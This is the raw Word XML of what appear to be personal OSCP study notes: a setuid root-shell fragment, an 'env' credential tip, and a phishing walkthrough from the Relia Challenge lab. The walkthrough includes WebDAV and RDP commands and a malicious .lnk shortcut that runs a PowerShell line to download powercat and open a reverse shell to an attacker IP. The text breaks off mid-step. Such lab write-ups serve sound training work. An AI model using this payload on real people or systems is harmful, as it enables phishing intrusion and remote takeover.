    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002677">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1270"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The check passes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002678">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1270"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">setuid(geteuid()) gives you root privileges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002679">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1270"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">execlp("sh", "sh", ...) spawns a shell with those privileges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000267A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000267B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000267C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026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7E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qtcgqzlly8nr" w:id="340"/>
      <w:bookmarkEnd w:id="340"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to check environment variables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000267F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002680">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">env</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002681">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="767"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Used in </w:t>
      </w:r>
      <w:hyperlink r:id="rId810">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Fired</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice to find creds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002682">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026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84">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002685">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_brjm5tyeypl7" w:id="341"/>
      <w:bookmarkEnd w:id="341"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phishing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002686">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002687">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Practical Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002688">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phishing examples can be found in the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">27.3.2. Phishing for Access</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" section of OSCP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002689">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I followed these instructions step by step for the Relia Challenge lab </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000268A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000268B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Learning the tools along with a practical example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000268C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Important tools for phishing (webdav, .lnk, .Library-ms) are all taught in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> OSCP 11.3.1. Obtaining Code Execution via Windows Library Files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000268D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000268E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Theory:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000268F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then the theory of phishing can be found in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Module 14 Phishing Basics of OSCP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002690">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002691">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002692">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002693">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002694">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_lf438rotc68k" w:id="342"/>
      <w:bookmarkEnd w:id="342"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phishing Attack Example</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002695">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002696">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was seen in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Relia Challenge lab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Phishing was done using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.xxx.249</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine and the target of the phishing attack was</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.xxx.189</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> since they had were the only ones with a bunch of mail services open on their ports.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002697">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002698">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And we knew we could do phishing since on the .249 machine found credentials for a mailing user (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">maildmz@relia.com</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) and it told us to email</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> jim@relia.com</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so it was clear this was a phishing attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002699">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000269A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000269B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000269C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000269D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mkdir /home/kali/webdav</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000269E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure you don't already have one. If you do, delete it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000269F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can confirm it's working by going to http://127.0.0.1 and we should see files inside of /home/kali/wedab if it has any</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xfreerdp3 /v:192.168.158.249 /u:hacker /p:'Password123!' /cert:ignore /dynamic-resolution +clipboard</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Log in via RDP so you can create shortcut file that will send back reverse shell when clicked by the person we are phishing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a malicious short cut. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This shortcut (when pressed by victim) will send a reverse shell back to us. This is in the format .lnk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Right click on the desktop in RDP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Click new</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Click shortcut</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the file path, paste this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.232:8000/powercat.ps1'); powercat -c 192.168.45.232 -p 4444 -e powershell"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
